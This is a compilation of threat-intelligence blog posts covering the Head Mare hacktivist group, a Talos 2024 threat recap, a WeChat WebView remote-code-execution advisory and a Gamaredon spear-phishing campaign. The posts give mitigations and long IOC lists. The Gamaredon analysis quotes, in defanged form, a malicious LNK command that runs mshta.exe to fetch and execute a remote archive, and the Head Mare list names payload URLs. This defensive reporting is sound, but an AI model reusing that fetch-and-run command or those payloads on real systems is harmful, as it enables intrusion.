The Rise of Head Mare: A Geopolitical and Cybersecurity Analysis 

/in

Key takeaways 


The Head Mare hacktivist group targets Russian and Belarusian organizations, linking their cyberattacks to geopolitical tensions with Ukraine. 

Head Mare’s attacks on Russia and Belarus are strategic, aiming to influence political and economic stability in these countries and support its own objectives. 

The group uses sophisticated phishing and ransomware attacks, exploiting vulnerabilities like CVE-2023-38831 in WinRAR and ransomware strains like LockBit and Babuk. 

Head Mare’s cyber operations align with the Russo-Ukrainian conflict, applying pressure on Russia and Belarus to distract from Ukraine’s military actions. 

The group employs advanced techniques for persistence and evasion, disguising malware and using sophisticated tools to control compromised systems. 

Head Mare uses the Sliver framework to manage compromised systems, ensuring their command-and-control infrastructure is resilient. 

Tools like Mimikatz are used to extract credentials, enhancing their control over targeted networks. 

Overview 

The Head Mare hacktivist group has emerged as a formidable digital adversary in today’s geopolitical conflicts. First reported in 2023 on X (previously Twitter), Head Mare has targeted Russian and Belarusian organizations. The group’s actions are not merely technical intrusions but are deeply entwined with the broader political tensions between these countries and their neighbors, particularly in the context of the ongoing Russo-Ukrainian conflict. 

Head Mare’s focus on Russian and Belarusian entities is a strategic choice rather than a coincidence. By targeting organizations within these nations, Head Mare aligns its cyber operations with the geopolitical friction between Russia, Belarus, and Ukraine. This approach reflects a deliberate attempt to influence the political and economic stability of these countries through cyber means, thus amplifying the existing geopolitical tensions. 

The group’s operations include deploying sophisticated phishing campaigns and ransomware attacks. By exploiting vulnerabilities like CVE-2023-38831 in WinRAR and utilizing ransomware strains such as LockBit and Babuk, Head Mare aims to destabilize key organizations within Russia and Belarus.  

The Geopolitical Angle of Head Mare’s Activities 

The geopolitical implications of Head Mare’s activities are evident in their choice of targets and methods. By focusing on Russian and Belarusian organizations, Head Mare is engaging in a form of cyber warfare that complements the broader Russo-Ukrainian conflict. The group’s attacks are likely intended to support Ukraine’s strategic objectives by applying additional pressure on Russia and Belarus. 

The Russian military’s struggles, especially following Ukraine’s recent offensive into Kursk, have heightened the need for strategic distractions. President Vladimir Putin has used Belarus to create a diversion, hoping that the buildup of Belarusian troops near the Ukrainian border would draw Ukrainian forces away from their offensive operations. Head Mare’s attacks fit into this geopolitical maneuvering by amplifying the pressure on Russia and Belarus. 

The situation on the ground further illustrates the intertwining of cyber operations and geopolitical strategy. In August, Belarusian President Alyaksandr Lukashenka announced the deployment of a significant portion of Belarus’s army to the Ukrainian border, citing concerns over a potential Ukrainian offensive. Lukashenka claimed this move was a response to a perceived build-up of Ukrainian troops, which he attributed to a misunderstanding of Belarus’s preparations for Independence Day celebrations. 

Despite the official narrative, Lukashenka’s actions are likely influenced by Moscow’s broader strategy. The Belarusian leader’s military deployment aligns with Putin’s attempt to create a strategic diversion. However, Belarus’s involvement in the conflict remains complex.  

Lukashenka’s regime is heavily dependent on Russian support, yet Belarusian society shows limited enthusiasm for direct involvement in the war against Ukraine. This lack of domestic support, combined with Lukashenka’s precarious political position, suggests that a full-scale Belarusian invasion of Ukraine remains unlikely. 

Technical Sophistication and Strategic Intent 

Head Mare’s cyber tactics reflect both technical sophistication and strategic intent. The group employs advanced phishing techniques to exploit vulnerabilities in widely used software, such as WinRAR. By deploying multiple malware types, Head Mare establishes a foothold in targeted systems, enabling further attacks and data collection. 

Persistence techniques are another hallmark of Head Mare’s operations. By adding malware samples to the Windows Run registry key or creating scheduled tasks, the group ensures that their malware remains active and continues to transmit data to their command-and-control servers. These methods not only enhance the group’s operational longevity but also contribute to the ongoing disruption. 

Detection evasion is a critical component of Head Mare’s strategy. The group disguises its malware as legitimate software, using deceptive filenames to bypass traditional security measures. This approach allows them to maintain a low profile while exerting a significant influence over compromised systems. 

Command and Control Infrastructure and Credential Theft 

Head Mare utilizes the Sliver framework for managing compromised systems, demonstrating a high level of sophistication in its cyber operations. Sliver enables the group to execute commands, manage connections, and navigate network restrictions effectively. By disguising its Sliver implants and using VPS/VDS servers, Head Mare ensures that its command-and-control infrastructure remains resilient and challenging to dismantle. 

Credential theft is another crucial aspect of Head Mare’s strategy. Tools like Mimikatz and XenArmor All-In-One Password Recovery Pro3 facilitate the extraction of credentials from compromised systems. This capability allows Head Mare to escalate their access and maintain control over targeted networks, amplifying their disruptive impact. 

Head Mare’s use of ransomware, including LockBit and Babuk, highlights their intent to cause maximum disruption. LockBit targets Windows systems, while Babuk is designed for ESXi servers. The encryption of files and the demand for ransoms serve both financial and operational purposes. By employing multiple ransomware variants and encrypting files twice, Head Mare increases the complexity of recovery and intensifies the pressure on victims to comply with their demands. 

Conclusion 

Head Mare’s cyber operations illustrate the evolving nature of cyber threats and their intersection with geopolitics. By targeting organizations in Russia and Belarus with sophisticated phishing and ransomware attacks, the group leverages its technical capabilities to influence political outcomes and create disruption.  

Head Mare’s operations are a reflection of the broader geopolitical dynamics at play, with their cyber tactics serving as a means to exert political pressure and shape public perceptions. As the conflict between Russia and Ukraine continues to unfold, the role of cyber actors like Head Mare will likely remain an influential factor in international relations and security. 

Recommendations and Mitigation 

To counteract the threats posed by Head Mare and similar actors, organizations should implement the following best practices: 


Continuously scan for vulnerabilities and apply patches promptly to mitigate the risk of exploitation. 

Maintain encrypted backups in isolated locations to safeguard against ransomware attacks. 

Use EDR solutions to detect and respond to malicious activities in real time. 

Educate employees on recognizing and avoiding phishing attempts and other cyber threats. 

Keep systems and software up to date with the latest security patches to reduce vulnerabilities. 

Indicators of Compromise (IOCs) 

Indicator  
Type of Indicator  
Comments  

201F8DD57BCE6FD70A0E1242B07A17F489C5F873278475AF2EAF82A751C24FA8  
SHA-256  
NA  

9F5B780C3BD739920716397547A8C0E152F51976229836E7442CF7F83ACFDC69  
SHA-256  
NA  

08DC76D561BA2F707DA534C455495A13B52F65427636C771D445DE9B10293470  
SHA-256  
NA  

6A889F52AF3D94E3F340AFE63615AF4176AB9B0B248490274B10F96BA4EDB263  
SHA-256  
NA  

33786D781D9C492E17C56DC5FAE5350B94E9722830D697C3CBD74098EA891E5A  
SHA-256  
NA  

5D924A9AB2774120C4D45A386272287997FD7E6708BE47FB93A4CAD271F32A03  
SHA-256  
NA  

9B005340E716C6812A12396BCD4624B8CFB06835F88479FA6CFDE6861015C9E0  
SHA-256  
NA  

5A3C5C165D0070304FE2D2A5371F5F6FDD1B5C964EA4F9D41A672382991499C9  
SHA-256  
NA  

DC3E4A549E3B95614DEE580F73A63D75272D0FBA8CA1AD6E93D99E44B9F95CAA  
SHA-256  
NA  

053BA35452EE2EA5DCA9DF9E337A3F307374462077A731E53E6CC62EB82517BD  
SHA-256  
NA  

2F9B3C29ABD674ED8C3411268C35E96B4F5A30FABE1AE2E8765A82291DB8F921  
SHA-256  
NA  

015A6855E016E07EE1525BFB6510050443AD5482039143F4986C0E2AB8638343  
SHA-256  
NA  

9D056138CFB8FF80B0AA53F187D5A576705BD7954D36066EBBBF34A44326C546  
SHA-256  
NA  

22898920DF011F48F81E27546FECE06A4D84BCE9CDE9F8099AA6A067513191F3  
SHA-256  
NA  

2F1EE997A75F17303ACC1D5A796C26F939EB63871271F0AD9761CDBD592E7569  
SHA-256  
NA  

AF5A650BF2B3A211C39DCDCAB5F6A5E0F3AF72E25252E6C0A66595F4B4377F0F  
SHA-256  
NA  

9E9FABBA5790D4843D2E5B027BA7AF148B9F6E7FCDE3FB6BDDC661DBA9CCB836  
SHA-256  
NA  

B8447EF3F429DAE0AC69C38C18E8BDBFD82170E396200579B6B0EFF4C8B9A984  
SHA-256  
NA  

92804FAAAB2175DC501D73E814663058C78C0A042675A8937266357BCFB96C50  
SHA-256  
NA  

664B68F2D9F553CC1ACFB370BCFA2CCF5DE78A11697365CF8646704646E89A38  
SHA-256  
NA  

311EDF744C2E90D7BFC550C893478F43D1D7977694D5DCECF219795F3EB99B86  
SHA-256  
NA  

4C218953296131D0A8E67D70AEEA8FA5AE04FD52F43F8F917145F2EE19F30271  
SHA-256  
NA  

2D3DB0FF10EDD28EE75B7CF39FCF42E9DD51A6867EB5962E8DC1A51D6A5BAC50  
SHA-256  
NA  

DC47D49D63737D12D92FBC74907CD3277739C6C4F00AAA7C7EB561E7342ED65E  
SHA-256  
NA  

EDA18761F3F6822C13CD7BEAE5AF2ED77A9B4F1DC7A71DF6AB715E7949B8C78B  
SHA-256  
NA  

188.127.237[.]46  
IP  
NA  

45.87.246[.]169  
IP  
NA  

45.87.245[.]30  
IP  
NA  

185.80.91[.]107  
IP  
NA  

188.127.227[.]201  
IP  
NA  

5.252.176[.]47  
IP  
NA  

45.11.27[.]232  
IP  
NA  

188.127.237[.]46/winlog.exe  
URL  
NA  

188.127.237[.]46/servicedll.exe  
URL  
NA  

194.87.210[.]134/gringo/splhost.exe  
URL  
NA  

194.87.210[.]134/gringo/srvhost.exe  
URL  
NA  

94.131.113[.]79/splhost.exe  
URL  
NA  

94.131.113[.]79/resolver.exe  
URL  
NA  

45.156.21[.]178/dlldriver.exe  
URL  
NA  

5.252.176[.]77/ngrok.exe  
URL  
NA  

5.252.176[.]77/sherlock.ps1  
URL  
NA  

5.252.176[.]77/sysm.elf  
URL  
NA  

5.252.176[.]77/servicedll.rar  
URL  
NA  

5.252.176[.]77/reverse.exe  
URL  
NA  

5.252.176[.]77/soft_knitting.exe  
URL  
NA  

5.252.176[.]77/legislative_cousin.exe  
URL  
NA  

5.252.176[.]77/2000×2000.php  
URL  
NA  

Sources:  


https://jamestown.org/program/developments-on-belarus-ukraine-border-prompt-roller-coaster-of-reactions-in-minsk/ 

https://kyivindependent.com/belarus-moved-third-of-its-army-to-ukraine-border-due-to-independence-day-celebration-mixup-lukashenko-claims/ 

https://www.atlanticcouncil.org/blogs/ukrainealert/putin-hopes-belarus-border-bluff-can-disrupt-ukraines-invasion-of-russia/ 

https://www.aljazeera.com/news/2024/8/18/belarus-says-ukraine-amassing-troops-at-border-amid-incursion-into-russia 

The post The Rise of Head Mare: A Geopolitical and Cybersecurity Analysis  appeared first on Cyble.

Blog – Cyble – ​Read More

The 2024 Threat Landscape State of Play

/in

As we head into the final furlong of 2024, we caught up with Talos’ Head of Outreach Nick Biasini to ask him what sort of year it’s been so far in the threat landscape. 

In this video, Nick outlines his two major areas of concern. He also focusses on one state-sponsored actor that has been particularly active this year (Clue: It rhymes with “Bolt Teaspoon”), and we talk about why the infostealer market has gone through a maturing phase, and why that’s an issue for defenders.

After you’ve watched the video, I’ve highlighted some of our threat spotlight blogs from the year so far below, which may be worth a revisit.

2024 in threat research:

Jan. 18: Exploring malicious Windows drivers

Drivers have long been of interest to threat actors, whether they are exploiting vulnerable drivers or creating malicious ones. Malicious drivers are difficult to detect and successfully leveraging one can give an attacker full access to a system. Part 1 of our Driver series served as a starting point for learning about malicious drivers while part 2, released in June, covered the I/O system, IRPs, stack locations, IOCTLs and more.

Feb. 8: New Zardoor backdoor used in long-term cyber espionage operation targeting an Islamic organization

Talos discovered a new, stealthy espionage campaign that likely persisted since at least March 2021. The observed activity affects an Islamic non-profit organization using backdoors for a previously unreported malware family we have named “Zardoor.” 

Feb. 15: TinyTurla Next Generation — Turla APT spies on Polish NGOs

This backdoor we called “TinyTurla-NG” (TTNG) was similar to Turla’s previously disclosed implant, TinyTurla, in coding style and functionality implementation.

Feb. 20: Astaroth, Mekotio & Ousaban abusing Google Cloud Run in LATAM-focused malware campaigns

Since September 2023, we observed a significant increase in the volume of malicious emails leveraging the Google Cloud Run service to infect potential victims with banking trojans.

Feb. 27: TimbreStealer campaign targets Mexican users with financial lures

Talos observed a phishing spam campaign targeting victims in Mexico, luring users to download a new obfuscated information stealer we’re calling TimbreStealer, which has been active since at least November 2023.

March 5: GhostSec’s joint ransomware operation and evolution of their arsenal

We observed a surge in GhostSec’s malicious activities this past year. GhostSec evolved with a new GhostLocker 2.0 ransomware, a Golang variant of the GhostLocker ransomware.

April 9: Starry Addax targets human rights defenders in North Africa with new malware

We disclosed a new threat actor we deemed “Starry Addax” targeting mostly human rights activists, associated with the Sahrawi Arab Democratic Republic (SADR) cause with a novel mobile malware.

April 16: Large-scale brute-force activity targeting VPNs, SSH services with commonly used login credentials

Talos actively monitored a global increase in brute-force attacks against a variety of targets, including Virtual Private Network (VPN) services, web application authentication interfaces and SSH services since at least March 18, 2024.  

April 17: OfflRouter virus causes Ukrainian users to upload confidential documents to VirusTotal

During a threat-hunting exercise, Talos discovered documents with potentially confidential information originating from Ukraine. The documents contained malicious VBA code, indicating they may be used as lures to infect organizations. 

April 23: Suspected CoralRaider continues to expand victimology using three information stealers

Talos discovered a new PowerShell command-line argument embedded in the LNK file to bypass anti-virus products and download the final payload into the victims’ host.

April 24: ArcaneDoor — New espionage-focused campaign found targeting perimeter network devices

ArcaneDoor was a campaign that was the latest example of state-sponsored actors targeting perimeter network devices from multiple vendors. Coveted by these actors, perimeter network devices are the perfect intrusion point for espionage-focused campaigns.

May 22: From trust to trickery: Brand impersonation over the email attack vector

Cisco developed and released a new feature to detect brand impersonation in emails when adversaries pretend to be a legitimate corporation.

May 31: New banking trojan “CarnavalHeist” targets Brazil with overlay attacks

Since February 2024, Cisco Talos observed an active campaign targeting Brazilian users with a new banking trojan called “CarnavalHeist.” Many of the observed tactics, techniques and procedures (TTPs) were common among other banking trojans coming out of Brazil.

June 5: DarkGate switches up its tactics with new payload, email templates

DarkGate was observed distributing malware through Microsoft Teams and even via malvertising campaigns.

Aug. 1: APT41 likely compromised Taiwanese government-affiliated research institute with ShadowPad and Cobalt Strike

ShadowPad, widely considered the successor of PlugX, is a modular remote access trojan (RAT) only seen sold to Chinese hacking groups.

Aug. 28: BlackByte blends tried-and-true tradecraft with newly disclosed vulnerabilities to support ongoing attacks

In recent investigations, Talos Incident Response observed the BlackByte ransomware group using techniques that depart from their established tradecraft. 

 

You can always bookmark the Threat Source newsletter to keep up to date with all things Talos threat research.

Cisco Talos Blog – ​Read More

Vulnerability in Tencent WeChat custom browser could lead to remote code execution

/in

Certain versions of WeChat, a popular messaging app created by tech giant Tencent, contain a type confusion vulnerability that could allow an adversary to execute remote code. While this issue, CVE-2023-3420, was disclosed and patched in the V8 engine in June 2023, the WeChat Webview component was not updated, and still remained vulnerable when Talos reported to the vendor in April 2024.  Cisco Talos researchers have confirmed that WeChat versions up to 8.0.42 (the latest version on the Google Play store for Android devices before June 14, 2024) were vulnerable to this issue. However, due to the dynamic WebView loading mechanism, Talos cannot confirm if it’s patched on all versions. Talos reported the vulnerability to Tencent WeChat on April 30, 2024, and continued our investigation in the following weeks and months. 

Vulnerability overview 

WeChat is an instant messenger application with a large user base in China. It also offers users the ability to pay for certain products through the app and includes several functionalities similar to other social media platforms like Facebook and X. 

During Cisco Talos’ research of WeChat, we uncovered that it employs a custom WebView component instead of relying on the built-in Android WebView. This component is a custom version of XWalk, maintained by Tencent, which consists of an embedded Chromium browser with V8 version 8.6.365.13 released on Oct. 12, 2020, supporting the rendering of HTML and the execution of JavaScript. 

The custom WebView component is dynamically downloaded onto the phone after the user logs into the app for the first time, allowing Tencent to deploy dynamic updates. When downloaded, XWalk webview is located at the path `/data/data/com.tencent.mm/app_xwalk_4433/apk/base.apk`. The library at /data/data/com.tencent.mm/app_xwalk_4433/extracted_xwalkcore/libxwebcore.so contains an embedded browser environment with an outdated version of V8.  

GitHub Security Labs published detailed analysis of this vulnerability, CVE-2023-3420, for V8 version 11.4.183.19 in June 2023.      

How can the exploit be triggered? 

The exploit, which we have seen in the wild,  is triggered when the victim clicks a URL in a malicious WeChat message. Clicking a URL in WeChat causes the webpage with embedded JavaScript to be loaded inside XWalk, which triggers exploitation. A so called one-click exploit. 

What is the impact of this vulnerability? 

The exploit allows the threat actor to gain control of the victim’s device and execute arbitrary code. 

CVSSv3 Score: 8.8 – CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

How do I know if I’m impacted? 

Talos has confirmed the WeChat version 8.0.42 (the latest version available on the Play Store before June 14) is impacted. For WeChat using the impacted custom browser (MMWEBID/2247), the user agent of request includes the version information of the custom browser. For example: 

Mozilla/5.0 (Linux; Android 14; Pixel 6 Build/UQ1A.240105.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/86.0.4240.99 XWEB/4433 MMWEBSDK/20230805 Mobile Safari/537.36 MMWEBID/2247 MicroMessenger/8.0.42.2428(0x28002A48) WeChat/arm64 Weixin GPVersion/1 NetType/4G Language/en ABI/arm64  

What do I do if I’m impacted? 

Update to the latest version of WeChat and confirm XWalk is updated as well (in our testing, the app does not get updated to the latest version automatically right after the update is released). Alternatively, do not click on any links sent over WeChat if using the impacted versions. If you must read links, copy the link from the WeChat chat and open them on an updated web browser outside the application. We recommend WeChat users be aware of the URL links sent in WeChat. Before clicking the URL links, verify it’s from a trusted source.  

Bug report Timeline 

April 30, 2024: Disclosed to vendor while research was ongoing. May 31, 2024: Tencent acknowledges report and confirms they know about the vulnerability and are working on patching it. June 14, 2024: New version of WeChat 8.0.48 released on Play Store. However, the app on our testing device did not get automatically updated.  June 27, 2024: Notified Vendor of our intention to publish. 

Credit 

Chi En Shen (Ashley Shen), Vitor Ventura, Michael Gentile and Aleksandar Nikolic of Cisco Talos.  

Cisco Talos Blog – ​Read More

Spear-Phishing in the Battlefield: Gamaredon’s Ongoing Assault on Ukraine’s Military

/in

Key Takeaways


Cyble Research and Intelligence Labs (CRIL) identified an active Gamaredon campaign targeting Ukrainian military personnel through spear-phishing emails.

The emails include malicious XHTML attachments, which, when opened, execute obfuscated JavaScript code that downloads a malicious archive to the victim’s system.

This archive contains a Windows shortcut (LNK) file that, when triggered, initiates the execution of a remote .tar archive hosted on TryCloudflare[.]com via mshta.exe.

The Threat Actors (TAs) leverage TryCloudflare’s one-time tunnel feature to anonymously host malicious files and access resources remotely without detection.

The campaign appears to be large-scale and coordinated, as indicated by the widespread distribution of similar files, and it remains ongoing based on the volume and timing of discovered samples.

The inclusion of a 1-pixel remote image suggests the TAs are tracking victim interactions with the malicious files, likely to monitor the campaign’s effectiveness.

Executive Summary

As the Russia-Ukraine conflict continues to evolve, we remain vigilant in monitoring emerging threats. Previously, we tracked the activities of UNC1151, which targeted Ukraine’s Ministry of Defence with a malicious Excel document designed to compromise sensitive systems. Additionally, we observed UAC-0184’s malware campaign, which deployed the XWORM RAT against Ukrainian targets, utilizing Python to facilitate DLL sideloading techniques for further infiltration.

During our investigation, we came across an ongoing campaign of Gamaredon targeting Ukraine. Gamaredon, also known as Primitive Bear or Armageddon, is a Russian-linked Advanced Persistent Threat (APT) group that has been active since at least 2013. It is known for its cyber-espionage activities, primarily targeting Ukrainian government institutions, military, and other critical infrastructure sectors.

Gamaredon has been involved in numerous high-profile campaigns, particularly during periods of heightened tension between Russia and Ukraine. Although its operations have been characterized by the use of relatively low-sophistication tools, its success is attributed to its persistence and focus on specific geopolitical targets.

In recent months, Gamaredon has intensified its efforts with a large-scale phishing campaign aimed at Ukrainian entities. This campaign involves sophisticated tactics and widespread phishing attempts, reflecting the ongoing and escalating nature of cyber threats amidst the conflict. The figure below shows the Gamaredon sample observed since the start of August 2024.

Amid the ongoing Russia-Ukraine conflict, Cyble Research and Intelligence Labs (CRIL) encountered a spear-phishing campaign targeting Ukrainian military personnel. The malicious email contains an XHTML attachment that, upon opening, executes several malicious activities on the infected system. After thorough analysis, our research points to the Gamaredon APT group as the orchestrator of this attack. 

Technical Details

The campaign begins with a spear-phishing email bearing the subject “ПОВІСТКА,” which translates to “summons.” The email is themed around a military summons directed at the recipient and includes a malicious XHTML attachment, as shown in the figure below.

Upon opening the XHTML file, the user is presented with a message in Ukrainian stating, “File uploaded to the ‘DOWNLOADS’ folder.” Simultaneously, a RAR compressed folder is silently dropped into the system’s Downloads directory. This action is designed to mislead the victim, making it appear as though a legitimate file has been downloaded. The figure below shows the XHTML message.

The XHTML file contains obfuscated JavaScript code that executes upon the user opening the file. In the XHTML, the JavaScript is embedded within a `div` element, with the `div id` set to “jwu.” This obfuscated script consists of a Base64-encoded string mixed with a “*” character at random places to evade detection. The JavaScript execution is triggered via the “onerror” event. In some variants, it is activated through the “onmousemove” event, ensuring the malicious code runs as soon as the user interacts with the file. The figure below shows the obfuscated XHTML code.

The de-obfuscated string within the “jwu” `div` reveals JavaScript code that contains a Base64-encoded 7zip compressed archive disguised with a .rar file extension. This script decodes the Base64 data and saves the 7zip archive to the Downloads folder as “5-2839-2024_29.08.2024.rar.” Additionally, the script retrieves a 1-pixel remote image, likely serving as a tracking mechanism to monitor the execution and interaction with the malicious file. The figure below shows the de-obfuscated JavaScript.

The RAR file contains a Windows shortcut (LNK) file. Upon execution, the malicious LNK file triggers the execution of the remote .tar file via mshta.exe. In this campaign, the TAs leveraged the domain trycloudflare[.]com to host the malicious tar archives. By exploiting the TryCloudflare service, TAs can establish a one-time tunnel without the need for an account with Cloudflare. This tunnel enables remote access to resources and data outside the local network, functioning similarly to a VPN or secure shell (SSH) protocol, allowing the attackers to evade traditional detection mechanisms.

The Target command of the LNK file is mentioned below.


“C:WindowsSystem32mshta.exe hxxps://jurisdiction-xhtml-peace-surrey[.]trycloudflare.com/tcg/instruct/instructor.tar /f”

 The figure below shows the property of the LNK file.

We were unable to obtain the .tar files in our research. However, according to an analysis by Cisco Talos, Gamaredon is known for downloading additional malicious files designed to steal sensitive information from the victim’s system.

Conclusion

The ongoing Gamaredon APT campaign demonstrates the group’s persistence and evolving tactics in targeting Ukrainian military personnel. By leveraging spear-phishing emails, malicious XHTML attachments, and obfuscated JavaScript, the attackers deliver harmful payloads while exploiting TryCloudflare’s one-time tunnel feature to host malicious archives. The campaign’s scale and frequency indicate a coordinated, mass phishing effort aimed at sensitive Ukrainian entities.

Recommendations

The following are the recommendations to Mitigate the Gamaredon APT Campaign.


Train users to recognize spear-phishing attempts, especially those with suspicious attachments or unexpected military-themed content.

Implement email security solutions with advanced threat protection, filtering phishing emails and malicious attachments.

Deploy anti-malware solutions capable of detecting and blocking obfuscated JavaScript and malicious LNK files. 

Monitor for unusual network activity, including connections to TryCloudflare tunnels and other unknown external resources.

Use application whitelisting to allow only trusted applications and scripts to run.

Leverage threat intelligence platforms to block known malicious domains, including those abusing TryCloudflare.

MITRE ATT&CK® Techniques

Tactic 
Technique
Procedure

Initial Access (TA0001)
Phishing: Spearphishing Attachment (T1566.001 )
Gamaredon sends spear-phishing emails with malicious XHTML attachments targeting Ukrainian military personnel.

Execution (TA0002)
User Execution: Malicious File (T1204.002)
The campaign relies on users opening the XHTML attachment, which then triggers JavaScript code execution.

Execution (TA0002)
Signed Binary Proxy Execution: Mshta (T1053.005)
mshta.exe is used to execute a remote .tar archive file hosted on a compromised cloud service.

Defence Evasion (TA0005)
Obfuscated Files or Information (T1027)
The campaign uses obfuscated JavaScript hidden in the XHTML file, including random “*” characters in Base64 encoded strings to avoid detection.

Indicators Of Compromise

Indicator
Indicator Type
Description

0c823adb18cf2583222e6fbe73c08cac8147d20b02fbe88d51cac2a1c628a30b
SHA256
XHTML

12bac5853724722330ce7f6b782db13844f8343ccc851fa2db1e93b980a6cf49
SHA256
XHTML

a4806713db9cf41ab503e046981b8c5e1a9928314bb32545bd104fab2c36b332
SHA256
XHTML

0fd6e081172d8576ad2f16ab6360a0086442560aa24ab1f4636a592f279c19ef
SHA256
XHTML

66de05ae4f4f185a514ad11daac0b7f944748ffa6885a7d7a826def45d305cfe
SHA256
XHTML

1a6ce74fc1487537936d769243f39b265fd3911e72e7caacaa793f1fffe52296
SHA256
XHTML

e6d342fde640e5d5d9ef2f470d0f23ed660d7f19cc33470ec40a9f8e9b9c1561
SHA256
XHTML

17f66f2b3e2f9ba8c8f739876f99e2d7abc81b264f3015d3de86267f007cc49b
SHA256
XHTML

10cecb7a032325024b9ba7a0ea5f1a910268078317ca4ca7dae9e06779837631
SHA256
XHTML

83d4b0aea975acb7f80417748f179d8ef9ecbba9150b24e3354ef92e17ccf242
SHA256
XHTML

201ad0967246bb0a5b3f7aa85f31395e750c0237959d86b9c2d9dbf5fbb951c4
SHA256
XHTML

d4df2899a4569f7cb9ac5edce6b4eef8eba3031b7f96f74552734362afea18b7
SHA256
XHTML

95beb4bd1a94c8db58dddeb926f656003e1dca2c66d04870380445b23840b536
SHA256
XHTML

13f065a592246074d7d929dd4f977d247a69efa9e1dbbe3613f81d3d8f39d6f4
SHA256
XHTML

a1d689a0839a143e371242fb217db82e0cbdfeff4daa49e6ffe5c5b3375fae3d
SHA256
XHTML

4b1d8e58c866a8b12e8987559287592ee54a482328e8c03d5666a761bcf10f92
SHA256
XHTML

db63ca233296a239e4b8d7f28b2db776596bcb645d3958bc4b3447074d7635b9
SHA256
XHTML

2da9941aae860aaa2d3bb7208c900549464955733457f529014d945a24737e79
SHA256
XHTML

2636907826c9bc27ee4c7519979c0add5ad981e71edf7eb53002b8ab89fc8142
SHA256
XHTML

e18955f5a9fb6abb30fd5dcbc840d34cce9bb1c70552cc36941139fc6e7304b5
SHA256
XHTML

0ae813d5ea1c0114795174a48b57a90c0f719485e3c733bbd5403c77dab29298
SHA256
XHTML

71e02cfc2c871768b8ae5ad9af9e9cb664e0a66be3f3c8d050b6d58f3cd4c07a
SHA256
XHTML

ad2c0c8d14d782610ed7173a5d0b4bd13524ceb1027d070a1cda312cfd60983a
SHA256
XHTML

1cbd7696840ec6a3442a8bf4f7deb545bbeeee68fb27e4352197953af976cf2a
SHA256
XHTML

0a4bcecdee823cc3c2d4ae2d5569edca7bc8372f5d37f62083782e92732a63c8
SHA256
XHTML

afa7a8bb0cb0508f579b936488bbfff0142d458c26ef98904cb06e98f6b50f81
SHA256
XHTML

265042be55ec0082a500a24cdb5da8b289c42116e23eddcfc80dfd24019f6412
SHA256
XHTML

1b3db58482ad147faeda64eced7648bee08bfc78194e3f7bcb52cf1860d07a04
SHA256
XHTML

821ee2a91cca1e17f890e099ee41a47cc5943149a10e81467e57803d6d5b02de
SHA256
XHTML

0e1eb8a5f850bc7712f78adcfe6c7c29215ea620ad2c36a0795016f0299d6ea4
SHA256
XHTML

f9662c14db97db311d71b00ce33a41bbc4bc4ab6f05d8ccd99562e773d8948b1
SHA256
XHTML

c7802521935c6dc3dc81e15ac952b9782ca1743dcd9e4e11030f0957d8f2a156
SHA256
XHTML

56188e68f6f6bba34f6771056859f1a7232edef264fbe67e0c8b30c1ca569259
SHA256
XHTML

a620f9af481001e2d96a2d210f086fa144731a1b95db32addcd148e09a627374
SHA256
XHTML

df124b73f309e634ca7c226c5e1ae2545f45907a88a40249c8ac1d5e40eca43f
SHA256
XHTML

f94817a02884f73f9ed462c67581cda4fc169568f7636f01237a25da3df93d7c
SHA256
XHTML

5f7173cd548b227206e70419739a2f6ca4087ef693297b9b67a29fbcb4d1e928
SHA256
XHTML

f59715593679ff13e92e14f8f98c6ead1cbe678f3a5ac28de8085c1a7132b02c
SHA256
XHTML

58d6c125ccab32414f63ba62cc7ba4a2500a0d2890506069ba7e0ac166799491
SHA256
XHTML

51427e20fc02cb04948c2ab53378beb52727a6a84570f880aeaebd6be27f1dad
SHA256
XHTML

bbc97c086436385c32b0ac5f6cf35e7446f0e12e0412ed090e7099b873837795
SHA256
XHTML

a7d060ea2dfd98f723aff909e5c88c3d8d3d54d96e5f6e7a09aad1de8d8ef10b
SHA256
XHTML

cba52f16695dc3d80a98c560a7614a3f91aaea242344b423b260d06362a2c9e0
SHA256
XHTML

ab333d21c0fa8fe5b6cd620736fb04d7af53a6a0be604066617a1374fa7baa78
SHA256
XHTML

a4b912413e39b4307613c8941af258750782e77d820c172155dfaaee6b32d2db
SHA256
XHTML

c863155cf6a39a376eef232737ba2922e324d8b05de36ddebe4068060b09a498
SHA256
XHTML

bee43c5f1a714fdef911e5dc99fe27854f5db00de859dddc09e720eb56e1c53e
SHA256
XHTML

ca7a5daf2528233dae5c38d929a07ef30d5ca7d349df2ce842d795311f22fa2f
SHA256
XHTML

770223d8c0c7d5abd4d6c0215cf9479f7a0e32a1dfaaa3b42c71dfe26ccb986f
SHA256
XHTML

dacb0c04579116f6245ca0ee69a5d328c3f23e5d0c5f579133070fe0f06659d1
SHA256
XHTML

0a06f536d08150ce6ea521a563fd321229b9e044ce993f9a667336a34d838b3f
SHA256
XHTML

57dd02447cf705fe570ed6b3051f3bff06e8506360ba667e02731332d04eb37c
SHA256
XHTML

0e0ce820f8b5deae3755ed372a0b898861a4cc7cb70cfd90197452773b078452
SHA256
XHTML

dbdff73a7a6e6eae23c8cd5093b3df11f39cddf86e48b651e68c329df59ee0e8
SHA256
XHTML

c32f28fc87f8efcd3f9c044f1898f3e712d4b4802c99df1525644ebfb3df2f2d
SHA256
XHTML

e867ce12e119eebe53de1acccd99fca09a9802d1432d31dafaf5d76b8a87f099
SHA256
XHTML

92ee588be70e23ca459627ae22f05fba11589eeaeed0f8dd153416d952bb57e0
SHA256
XHTML

1ab3b99af98b7d9fb13d5b6acfc1bf3f4aa2a751bea58ba060f386509ccc73d3
SHA256
XHTML

b8f91aae00889eda914ef72b99688e920e113fb3723607250d2a1c949effaac3
SHA256
XHTML

b95eea2bee2113b7b5c7af2acf6c6cbde05829fab79ba86694603d4c1f33fdda
SHA256
XHTML

7525cd06447204ce72e5d24eb1e96c142d72f9f8f5339d61b6151f430bda2dae
SHA256
XHTML

be801d78c112fae7a1cec1d20e1f2a85f28987d15c825c1773860bc7e99c5e87
SHA256
XHTML

de2f0a2aafacfee9d7989cdafd0617211a44d320b0fba6c488f480d92dab0891
SHA256
XHTML

66d30cc00a2445c5527049875e43c2c85a8995a0983502cd5e0276235bab8040
SHA256
XHTML

450badddfae09a3eedb613e59f9a18d69632ee28d5e59e52c6d4bae151225f87
SHA256
XHTML

d55a4a4596908abc5742f43e9b44b23951935feead10de52f3916ac5fd811a80
SHA256
XHTML

7cdf0df1284b75a7d4e945d1d6a707c65e3527ae38aea7c9d82163c019c8203c
SHA256
